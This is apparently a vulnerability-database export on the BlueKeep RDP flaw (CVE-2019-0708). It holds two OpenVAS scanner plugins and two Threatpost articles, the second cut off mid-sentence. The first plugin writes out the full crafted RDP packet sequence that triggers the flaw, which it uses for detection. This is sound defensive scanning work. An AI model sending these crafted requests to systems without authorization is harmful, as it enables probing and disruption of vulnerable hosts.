script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4499175\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4499149\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4499180\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/help/4500331\");\n script_xref(name:\"URL\", value:\"https://blogs.technet.microsoft.com/msrc/2019/05/14/prevent-a-worm-by-updating-remote-desktop-services-cve-2019-0708/\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-us/help/4500705/customer-guidance-for-cve-2019-0708\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc732713(v=ws.11)\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/108273\");\n script_xref(name:\"URL\", value:\"http://packetstormsecurity.com/files/153133/Microsoft-Windows-Remote-Desktop-BlueKeep-Denial-Of-Service.html\");\n script_xref(name:\"URL\", value:\"https://www.malwaretech.com/2019/05/analysis-of-cve-2019-0708-bluekeep.html\");\n script_xref(name:\"URL\", value:\"https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/rdp-stands-for-really-do-patch-understanding-the-wormable-rdp-vulnerability-cve-2019-0708\");\n\n script_tag(name:\"summary\", value:\"This host is running Microsoft Windows Remote Desktop Services\n and is prone to the remote code execution vulnerability known as 'BlueKeep'.\");\n\n script_tag(name:\"vuldetect\", value:\"Sends a specially crafted request to the target systems\n Remote Desktop Service via RDP and checks the response.\");\n\n script_tag(name:\"insight\", value:\"A remote code execution vulnerability exists in Remote Desktop Services\n when an unauthenticated attacker connects to the target system using RDP and sends specially crafted requests.\n This vulnerability is pre-authentication and requires no user interaction.\n\n For an in-depth analysis and further technical insights and details please see the references.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an attacker to execute arbitrary code on the target system.\n An attacker could then install programs, view, change, or delete data, or create new accounts with full user rights.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows 7\n\n - Microsoft Windows Server 2008 R2\n\n - Microsoft Windows Server 2008\n\n - Microsoft Windows Server 2003 R2\n\n - Microsoft Windows Server 2003\n\n - Microsoft Windows Vista and Microsoft Windows XP (including Embedded)\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see\n the references for more information.\n\n As a workaround enable Network Level Authentication (NLA) on systems running supported\n editions of Windows 7, Windows Server 2008, and Windows Server 2008 R2.\n\n NOTE: After enabling NLA affected systems are still vulnerable to Remote Code Execution (RCE)\n exploitation if the attacker has valid credentials that can be used to successfully authenticate.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"rdp.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"dump.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"bin.inc\");\n\n# nb: Available since r25570 of libs 9.0\nif( ! defined_func( \"rsa_public_encrypt\" ) )\n exit( 0 );\n\nport = get_port_for_service( default:3389, proto:\"ms-wbt-server\" );\n\nif( get_kb_item( \"rdp/\" + port + \"/isxrdp\" ) )\n exit( 0 );\n\nif( ! soc = open_sock_tcp( port, transport:ENCAPS_IP ) ) # nb: Currently don't get a response back after sending the rdp_create_pdu_negotiation_request() request if SSL/TLS is used\n exit( 0 );\n\nreq = rdp_create_pdu_negotiation_request( use_cookie:TRUE );\nres = rdp_send_recv( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_negotiation_request()\" );\nlen = strlen( res );\n\n# nb: Length depends on if a mstshash Cookie was passed.\n# Without a cookie length is 11\n# With a cookie the length might be 11 or 19\n# see https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rdpbcgr/13757f8f-66db-4273-9d2c-385c33b1e483\nif( ! res || ( len != 11 && len != 19 ) || hexstr( res ) !~ \"^030000\" ) {\n close( soc );\n exit( 0 );\n}\n\nreq = rdp_create_pdu_connect_initial_request();\nres = rdp_send_recv( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_connect_initial_request()\" );\nif( ! res ) {\n close( soc );\n exit( 0 );\n}\n\nsrv_data = rdp_parse_serverdata( data:res, debug:FALSE );\nif( ! srv_data ) {\n close( soc );\n exit( 0 );\n}\n\nreq = rdp_create_pdu_erect_domain_request();\nrdp_send( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_erect_domain_request()\" );\n\nreq = rdp_create_pdu_attach_user_request();\nres = rdp_send_recv( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_attach_user_request()\" );\nif( ! res || strlen( res ) < 11 ) {\n close( soc );\n exit( 0 );\n}\n\nuser1 = substr(res, 9, 11);\n\nforeach id( make_list( 1009, 1003, 1004, 1005, 1006, 1007, 1008 ) ) {\n req = rdp_create_pdu_channel_request( user1:user1, channel_id:id, debug:FALSE );\n rdp_send_recv( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_channel_request()\" );\n}\n\nclient_rand = rdp_create_client_random();\n\nreq = rdp_create_pdu_security_exchange( client_rand:client_rand,\n public_exponent:srv_data[\"public_exponent\"],\n modulus:srv_data[\"modulus\"],\n bitlen:srv_data[\"bitlen\"] );\nrdp_send( socket:soc, data:req, debug:FALSE, debug_req_name:\"rdp_create_pdu_security_exchange()\" );\n\nclient_info_pkt = rdp_create_pdu_client_info_request();\n\nrc4_keys = rdp_calculate_rc4_keys( client_rand:client_rand, server_rand:srv_data[\"server_random\"], debug:FALSE );\n\nclient_confirm_active = rdp_create_pdu_client_confirm_active_request();\n\nsync = rdp_create_pdu_client_synchronize_request( target_user:1009 );\n\ncoop = rdp_build_pdu_client_control_cooperate();\n\nclient_req_control = rdp_create_pdu_client_control_request();\n\nevent_sync = rdp_create_pdu_client_input_event_sychronize_request();\n\nfont_list = rdp_create_pdu_client_font_list_request();\n\n# 0x03 = CHANNEL_FLAG_FIRST | CHANNEL_FLAG_LAST\nx86_payload = rdp_build_virtual_channel_pdu_request( flags:0x03, data:raw_string( 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ) );\nx64_payload = rdp_build_virtual_channel_pdu_request( flags:0x03, data:raw_string( 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 ) );\n\n# the whole static data which has to be encrypted\nfull_data = client_info_pkt + client_confirm_active + sync + coop + client_req_control + event_sync + font_list;\nfor( i = 0; i <= 5; i++ ) {\n full_data += x86_payload;\n full_data += x64_payload;\n}\n\nenc_data = rc4_encrypt( key:rc4_keys[\"initial_client_encryptkey_128\"], data:full_data );\n\n# Dissect the encrypted data again\n# TODO: NASL rc4_encrypt currently can't encrypt the data for our purposes so\n# the data needs to be dissected here (see comment in rdp_build_pkt() as well).\nstart = 0;\nend = strlen( client_info_pkt ) - 1;\nenc_client_info_pkt = substr( enc_data, start, end );\nenc_client_info_pkt = rdp_build_pkt( data:client_info_pkt, client_info:TRUE, rdp_sec:TRUE, enc_data:enc_client_info_pkt, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( client_confirm_active ) - 1;\nenc_client_confirm_active = substr( enc_data, start, end );\nenc_client_confirm_active = rdp_build_pkt( data:client_confirm_active, rdp_sec:TRUE, enc_data:enc_client_confirm_active, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( sync ) - 1;\nenc_sync = substr( enc_data, start, end );\nenc_sync = rdp_build_pkt( data:sync, rdp_sec:TRUE, enc_data:enc_sync, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( coop ) - 1;\nenc_coop = substr( enc_data, start, end );\nenc_coop = rdp_build_pkt( data:coop, rdp_sec:TRUE, enc_data:enc_coop, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( client_req_control ) - 1;\nenc_client_req_control = substr( enc_data, start, end );\nenc_client_req_control = rdp_build_pkt( data:client_req_control, rdp_sec:TRUE, enc_data:enc_client_req_control, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( event_sync ) - 1;\nenc_event_sync = substr( enc_data, start, end );\nenc_event_sync = rdp_build_pkt( data:event_sync, rdp_sec:TRUE, enc_data:enc_event_sync, hmackey:rc4_keys[\"mac_key\"] );\n\nstart = end + 1;\nend = start + strlen( font_list ) - 1;\nenc_font_list = substr( enc_data, start, end );\nenc_font_list = rdp_build_pkt( data:font_list, rdp_sec:TRUE, enc_data:enc_font_list, hmackey:rc4_keys[\"mac_key\"] );\n\nenc_x86_payload_list = make_list();\nenc_x64_payload_list = make_list();\n\nfor (i=0; i<=5; i++) {\n start = end + 1;\n end = start + strlen( x86_payload ) - 1;\n enc_x86_payload = substr( enc_data, start, end );\n # 0xed03 = Channel 1005\n enc_x86_payload = rdp_build_pkt( data:x86_payload, rdp_sec:TRUE, channel_id:raw_string( 0x03, 0xed ), enc_data:enc_x86_payload, hmackey:rc4_keys[\"mac_key\"] );\n enc_x86_payload_list[i] = enc_x86_payload;\n\n start = end + 1;\n end = start + strlen( x64_payload ) - 1;\n enc_x64_payload = substr( enc_data, start, end );\n # 0xed03 = Channel 1005\n enc_x64_payload = rdp_build_pkt( data:x64_payload, rdp_sec:TRUE, channel_id:raw_string( 0x03, 0xed ), enc_data:enc_x64_payload, hmackey:rc4_keys[\"mac_key\"] );\n enc_x64_payload_list[i] = enc_x64_payload;\n}\n\nres = rdp_send_recv( socket:soc, data:enc_client_info_pkt, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_info_request() / License packet\" );\n# nb: Windows XP sometimes sends a very large license packet. This is likely\n# some form of license error. When it does this it doesn't send a Server\n# Demand packet. If we wait on one we will time out here and error. We\n# can still successfully check for vulnerability anyway.\nif( ! res || strlen( res ) <= 34 )\n rdp_recv( socket:soc, debug:FALSE, debug_req_name:\"Server Demand packet\" );\n\n# nb: Keep the code here as is and don't raise the received length or e.g. use rdp_send_recv(). For some unknown reason trying\n# to change such things will cause a false negative against Windows XP systems.\nrdp_send( socket:soc, data:enc_client_confirm_active, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_confirm_active_request()\" );\n\nrdp_send( socket:soc, data:enc_sync + enc_coop, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_synchronize_request() and rdp_build_pdu_client_control_cooperate()\" );\n\nrdp_send( socket:soc, data:enc_client_req_control, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_control_request()\" );\n\nrdp_send( socket:soc, data:enc_event_sync, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_input_event_sychronize_request()\" );\n\nrdp_send( socket:soc, data:enc_font_list, debug:FALSE, debug_req_name:\"rdp_create_pdu_client_font_list_request()\" );\n\n# nb: Receive all data / clear the socket before sending the payloads below.\nfor( i = 0; i <= 5; i++ ) {\n _res = rdp_recv( socket:soc );\n if( ! _res )\n recv( socket:soc, length:1024, min:1 );\n}\n\nreport = \"By sending a crafted request the RDP service answered with a 'MCS Disconnect Provider Ultimatum PDU - 2.2.2.3' response which indicates that a RCE attack can be executed.\";\n\nfor( i = 0; i <= 5; i++ ) {\n\n rdp_send( socket:soc, data:enc_x86_payload_list[i], debug:FALSE, debug_req_name:\"x86 payload of rdp_build_virtual_channel_pdu_request()\" );\n rdp_send( socket:soc, data:enc_x64_payload_list[i], debug:FALSE, debug_req_name:\"x64 payload of rdp_build_virtual_channel_pdu_request()\" );\n\n # nb: Don't use rdp_recv() as it might not receive all data due to unexpected RDP packages\n # received where the length calculation from the header doesn't work as expected.\n res = recv( socket:soc, length:2048, min:1 );\n if( res && hexstr( res ) =~ \"^0300000902f0802180$\" ) {\n close( soc );\n security_message( port:port, data:report );\n exit( 0 );\n }\n\n for( j = 0; j<= 3; j++ ) {\n res = recv( socket:soc, length:2048, min:1 );\n if( res && hexstr( res ) =~ \"^0300000902f0802180$\" ) {\n close( soc );\n security_message( port:port, data:report );\n exit( 0 );\n }\n }\n}\n\nclose( soc );\nexit( 0 );\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-08T12:52:36", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-0708"], "description": "This host is missing a critical security\n update according to Microsoft KB4500331.", "modified": "2019-12-20T00:00:00", "published": "2019-05-17T00:00:00", "id": "OPENVAS:1361412562310814894", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310814894", "type": "openvas", "title": "Microsoft Windows Remote Desktop Service Remote Code Execution Vulnerability (KB4500331)", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.814894\");\n script_version(\"2019-12-20T10:24:46+0000\");\n script_cve_id(\"CVE-2019-0708\");\n script_bugtraq_id(108273);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-12-20 10:24:46 +0000 (Fri, 20 Dec 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-17 15:27:29 +0530 (Fri, 17 May 2019)\");\n script_name(\"Microsoft Windows Remote Desktop Service Remote Code Execution Vulnerability (KB4500331)\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security\n update according to Microsoft KB4500331.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\n on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw exists when an unauthenticated attacker\n connects to the system using RDP and sends specially crafted requests. The vulnerability\n is known as 'BlueKeep'.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an attacker to\n execute arbitrary code on the target system.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft Windows XP SP3\n\n - Microsoft Windows Server 2003 SP2\n\n - Microsoft Windows XP Professional x64 Edition SP2\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the\n references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.microsoft.com/en-in/help/4500331/windows-update-kb4500331\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"smb_reg_service_pack.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nsysPath = smb_get_system32root();\nif(!sysPath)\n exit(0);\n\nfileVer = fetch_file_version(sysPath:sysPath, file_name:\"\\drivers\\Termdd.sys\");\nif(!fileVer)\n exit(0);\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n if(version_is_less(version:fileVer , test_version:\"5.1.2600.7701\"))\n {\n report = report_fixed_ver(file_checked:sysPath + \"\\drivers\\Termdd.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 5.1.2600.7701\");\n security_message(data:report);\n exit(0);\n }\n}\n\nelse if(hotfix_check_sp(win2003:3, win2003x64:3, xpx64:3) > 0){\n\n if(version_is_less(version:fileVer , test_version:\"5.2.3790.6787\"))\n {\n report = report_fixed_ver(file_checked:sysPath + \"\\drivers\\Termdd.sys\",\n file_version:fileVer, vulnerable_range:\"Less than 5.2.3790.6787\");\n security_message(data:report);\n exit(0);\n }\n}\n\nexit(99);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2020-04-11T11:46:30", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "One million devices are still vulnerable to BlueKeep, a critical Microsoft bug with \u201cwormable\u201d capabilities, almost two weeks after a patch was released.\n\nThe flaw ([CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)) was fixed during Microsoft\u2019s [May Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin earlier this month. System administrators were urged to immediately deploy fixes as the flaw could pave the way for a similar rapidly-propogating attack on the [scale of WannaCry](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>).\n\nDespite that, researchers on Tuesday warned that one million devices linked to the public internet are still vulnerable to the bug. Making matters worse, a spike in scans for vulnerable systems was[ spotted over the weekend](<https://twitter.com/GreyNoiseIO/status/1132101252006010880>) \u2013 potentially indicating that bad actors are looking to sniff out the activity.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThat means when the worm hits, it\u2019ll likely compromise those million devices,\u201d said Robert Graham, researcher with Errata Security in a [Tuesday analysis](<https://blog.erratasec.com/2019/05/almost-one-million-vulnerable-to.html#.XO0rtS-ZPdd>). \u201cThis will likely lead to an event as damaging as WannaCry and notPetya from 2017 \u2013 potentially worse, as hackers have since honed their skills exploiting these things for ransomware and other nastiness.\u201d\n\n## BlueKeep\n\nThe critical remote code-execution flaw exists in Remote Desktop Services and impacts older version of Windows, including Windows 7, Windows XP, Server 2003 and Server 2008 (Microsoft deployed patches to Windows XP and Windows 2003 for the bug during Patch Tuesday, neither of which is still supported via monthly Patch Tuesday updates).\n\n\u201cBlueKeep\u201d has worried the infosec community because researchers describe it as a \u201cwormable\u201d flaw, similar to the EternalBlue exploit that was used by a rapidly-moving malware [attacks in 2017 like WannaCry](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>) or NotPetya.\n\n\u201cThis [bug] would have the potential of a global WannaCry-level event,\u201d said Chris Goettl, director of product management for security at Ivanti, during Patch Tuesday. \u201cWhat\u2019s more, Microsoft has released updates for Windows XP and Server 2003 (which you wouldn\u2019t have found unless you were looking at the Windows Update Catalog). So, this affects Windows 7, Server 2008 R2, XP and Server 2003.\u201d\n\n## Vulnerable Devices\n\nWhile Microsoft urged administrators to update impacted Windows systems as soon as possible, researchers said as recently as Tuesday that one million devices remain vulnerable to BlueKeep.\n\nErrata Security\u2019s Graham conducted a scan using his [Masscan](<https://github.com/robertdavidgraham/masscan>) Internet-scale port scanner (which searches for open ports) to look for the port (3389) used by Remote Desktop. This pinpointed all open ports \u2013 from there, in order to discover whether or not they were vulnerable, Graham used a Remote Desktop Protocol scanning project developed by [the Shadowserver Foundation](<https://rdpscan.shadowserver.org/>). From there, he found that almost one million devices both reliably talk to the Remote Desktop protocol and are vulnerable to BlueKeep.\n\n\u201cThe upshot is that these tests confirm that roughly 950,000 machines are on the public Internet that are vulnerable to this bug,\u201d said Graham. \u201cHackers are likely to figure out a robust exploit in the next month or two and cause havoc with these machines.\u201d\n\nIn the meantime, vendors are coming out with their own advisories for vulnerable devices.\n\nSeveral impacted devices include Siemens devices used in the medical space \u2013 including [radiation oncology](<https://cert-portal.siemens.com/productcert/pdf/ssa-433987.pdf>) products, [laboratory diagnostics](<https://cert-portal.siemens.com/productcert/txt/ssa-832947.txt>) products, [Radiography and Mobile X-ray](<https://cert-portal.siemens.com/productcert/pdf/ssa-932041.pdf>) products and [point of care diagnostics](<https://cert-portal.siemens.com/productcert/pdf/ssa-616199.pdf>) products.\n\n\u201cSome of these Siemens Healthineers products are affected by this vulnerability,\u201d said Siemens [in an advisory](<https://cert-portal.siemens.com/productcert/pdf/ssb-501863.pdf>). \u201cDepending on the target system and intent of the attacker, a successful exploit could result in data corruption and potential harm for patients and/or the environment.\u201d\n\nSiemens medical products, under its \u201cHealthineers\u201d line, were also hit by the [WannaCry ransomware](<https://threatpost.com/patches-pending-for-medical-devices-hit-by-wannacry/125758/>) in 2017. Seimens said it has scheduled some patches for these products in June, but for the most part suggested that end users disabled Remote Desktop Protocol.\n\n## Increase in Scans** **\n\nThreat actors are also actively sniffing out vulnerable devices. Researchers with GreyNoise over the weekend said that they are \u201cobserving sweeping tests for systems vulnerable to the RDP \u2018BlueKeep\u2019 (CVE-2019-0708) vulnerability from several dozen hosts around the Internet.\u201d\n\n> GreyNoise is observing sweeping tests for systems vulnerable to the RDP \"BlueKeep\" (CVE-2019-0708) vulnerability from several dozen hosts around the Internet. This activity has been observed from exclusively Tor exit nodes and is likely being executed by a single actor. [pic.twitter.com/iGwuGuD4Rq](<https://t.co/iGwuGuD4Rq>)\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [May 25, 2019](<https://twitter.com/GreyNoiseIO/status/1132101252006010880?ref_src=twsrc%5Etfw>)\n\nThe activity is likely being executed by a single actor, they said.\n\n\u201cThe reason we think it\u2019s one actor is because all connections that we\u2019re seeing are originating from Tor, and all of them are using the same scanner code, which we\u2019ve developed a fingerprint for,\u201d Andrew Morris, with GreyNoise, told Threatpost. \u201cWe don\u2019t necessarily know that the actor is malicious. This is simply based on the fact that they are coming out of Tor nodes exclusively and not coming from a known-legitimate mass scanner service like Shodan.\u201d\n\nResearchers for their part said that there are several steps that end users can take to protect themselves, but the very first is \u201cto apply Microsoft\u2019s patches, including old Windows XP, Windows Vista, and Windows 7 desktops and servers,\u201d said Graham.\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _**[**_our Threatpost webinar on May 29 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)**_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow._**\n", "modified": "2019-05-28T14:39:54", "published": "2019-05-28T14:39:54", "id": "THREATPOST:4F23E34A058045723339C103BC41A3D1", "href": "https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/", "type": "threatpost", "title": "One Million Devices Open to Wormable Microsoft BlueKeep Flaw", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-09T22:36:33", "bulletinFamily": "info", "cvelist": ["CVE-2019-0708"], "description": "While Microsoft issued patches for the [infamous BlueKeep vulnerability](<https://threatpost.com/fearing-wannacry-level-danger-enterprises-wrestle-with-bluekeep/146727/>) almost a year ago, researchers warn that almost half of connected medical devices in hospitals run on outdated Windows versions that are still vulnerable to the remote desktop protocol (RDP) flaw.\n\nResearchers said they found that 22 percent of a typical hospital\u2019s Windows devices were vulnerable to BlueKeep. Even worse, the number of connected medical devices running Windows that are vulnerable to BlueKeep is considerably higher \u2014 around 45 percent, they said. Vulnerable medical devices can include MRIs, ultrasounds, X-rays, and more, which run on operating systems \u2014 typically Windows \u2013 allowing their operators to more easily collect and upload data.\n\n\u201cFor hospitals, the task of monitoring vulnerabilities, identifying affected devices, chasing down suitable patches, and distributing those patches across a sprawling campus is tedious, to say the least,\u201d said researchers with CyberMDX in their [\u201c2020 Vision\u201d report on medical security](<https://www.cybermdx.com/hubfs/Downloadable%20Assets/2020%20Vision%20-%20A%20Review%20of%20Major%20IT%20&%20Cybersecurity%20Issues%20Affecting%20Healthcare_03.pdf?utm_source=hs_automation&utm_medium=email&utm_content=83601713&_hsenc=p2ANqtz-8LB8KZilre2-wOeS6fwp0EuTQ8bkZ8OabcwLXVVXks7psugIMYqyK69oRYFSdkRq2TGPzBLk3aWZ-UP3RdRdkidFD7zK5E4cEcDDhLW_2GPQxDsm0&_hsmi=83601713>), released Tuesday. \u201cThis process is slow and inefficient, as the hospitals usually do not know which devices or security issues to attend to first.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe BlueKeep flaw ([CVE-2019-0708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708>)) was fixed during Microsoft\u2019s [May 2019 Patch Tuesday](<https://threatpost.com/microsoft-patches-zero-day/144742/>) Security Bulletin. System administrators were urged to immediately deploy fixes as the flaw could pave the way for a similar rapidly-propagating attack on the [scale of WannaCry](<https://threatpost.com/one-year-after-wannacry-a-fundamentally-changed-threat-landscape/132047/>). In the months following the disclosure of BlueKeep, researchers tracked a [spike in scans for vulnerable systems](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) and eventually [active attacks exploiting the flaw](<https://threatpost.com/bluekeep-attacks-have-arrived-are-initially-underwhelming/149829/>).\n\nAlmost a year later, researchers have found that an alarming number of connected medical devices remain vulnerable to BlueKeep. The wormable implications of BlueKeep on medical devices are particularly concerning due to the hit that many hospitals took after attackers launched the [2017 WannaCry attack](<https://threatpost.com/leaked-nsa-exploit-spreading-ransomware-worldwide/125654/>), interrupting several critical services at hospitals across England.\n\nBeyond BlueKeep, outdated Windows versions are also exposing medical devices to an array of other vulnerabilities. For instance, up to 11 percent of connected medical devices are exposed to [DejaBlue](<https://threatpost.com/cisco-patches-six-critical-bugs/147585/>), a set of RDP flaws affecting Windows 7, Windows 8.1, and Windows 10 (as well as Windows Server 2008, Windows Server 2012, Windows Server 2016, and Windows Server 2019).\n\n## Medical Security Issues\n\nSo why haven\u2019t organizations updated their medical devices? This is due to a variety of reasons. Patch management, for one, is a big issue for hospitals. Researchers said that four months after a major vulnerability is disclosed, most hospitals will still not have patched more than 40 percent of their vulnerable devices.\n\nAccording to [previous CyberMDX research](<https://www.cybermdx.com/hubfs/Downloadable%20Assets/Clinical%20Connectivity%20Just%20the%20Facts.pdf?utm_source=hs_automation&utm_medium=email&utm_content=83092762&_hsenc=p2ANqtz--TX7BUvCUeXCs9gsaE02MUWeIzq19fY9l_6QNlrBUzDk3z95KxoqOtUK5Wv_fKxpu1OnstOR9UD7p1K99vW_onsXCua1uUwHXCYGM9pnVN2LhVX3M&_hsmi=83092762>), 80 percent of device manufacturers and healthcare orgs report that medical devices are \u201cvery difficult to secure,\u201d citing a lack of knowledge and training on secure coding practices, and pressure on development teams to meet product deadlines. The study also pointed to a lack of quality assurance and testing procedures for medical devices, which lead to more vulnerabilities slipping by when products go to market. In fact, nearly one in three organizations surveyed by CyberMDX said that they never audit their medical devices for known vulnerabilities.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/19133850/medical-device-connected.png>)\n\nThat\u2019s no surprise to Charles Ragland, security engineer at Digital Shadows, who worked in emergency rooms and on ambulances as a paramedic for 10 years. During that time, he witnessed outdated medical devices first hand, including cardiac catheterization lab systems running on Windows Server 2003.\n\n\u201cWith the level of complexity that involves managing networks with vast amounts of connected devices, it is not surprising that many of these devices have slipped through the cracks and remain vulnerable to threats such as BlueKeep,\u201d Ragland told Threatpost. \u201cAs always, the most effective risk mitigation techniques involve turning off unnecessary services, implementing network level authentication [for RDP], blocking access to sensitive ports, and ensuring timely security updates.\u201d\n\nChris Morales, head of security analytics at Vectra, told Threatpost that part of the problem also stems from a lack of accountability on the manufacturer, as devices are often brought in by medical staff and no one bothers to inform IT or security.\n\n\u201cMost medical devices are not updated as they serve a specific lifesaving function,\u201d he told Threatpost. \u201cWhile an OS update might seem benign, any interruption with the functioning of a medical device could have serious implications. Now this isn\u2019t a total excuse for not updating. Manufacturers need update testing processes that enable to have a timeline for validation and updating.\u201d\n\nMedical devices continue to be discovered riddled with vulnerabilities. Earlier this month, [Medtronic released updates](<https://threatpost.com/medtronic-patches-implanted-device-carelink/152533/>) to address known vulnerabilities in its line of connected medical devices that were initially disclosed last year and in 2018. In January, [researchers found six vulnerabilities](<https://threatpost.com/critical-mdhex-bugs-ge-medical-devices/152163/>) in a range of GE Healthcare devices for hospitals, which could allow attackers to disable the devices, harvest personal health information (PHI), change alarm settings and alter device functionality. In 2019, the Food and Drug Administration (FDA) [issued an emergency alert](<https://threatpost.com/fda-warns-of-potentially-fatal-flaws-in-medtronic-insulin-pumps/146109/>), warning that Medtronic MiniMed insulin pumps are vulnerable to potentially life-threatening cyberattacks.[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/02/19151849/hospitals.png>)\n\nThese security issues are leading to real-life attacks. In 2019, for instance, hospitals reported security incidents, from a server misconfiguration exposing data of 973,024 patients at UW Medicine, to phishing attacks compromising data at UConn Health and Oregon Department of Human Services; all the way up to full fledged ransomware attacks at the Columbia Surgical Specialist of Spokane, Sarrell Dental and Hospital Pavia Hato Rey.\n\nThomas Hatch, CTO and Co-Founder at SaltStack, told Threatpost that the security issues that the healthcare industry faces \u201cis a tip of the iceberg problem, where the real vulnerabilities are much more vast than what we can even see.\u201d\n\n\u201cIoT devices are notorious for being difficult to patch,\u201d he told Threatpost. \u201cThe systems built around them are designed for, in this case, hospital medical staff, not maintenance. IoT devices get built for the target use case which makes them difficult to maintain because a single doctors\u2019 office can be using many dramatically different devices; an 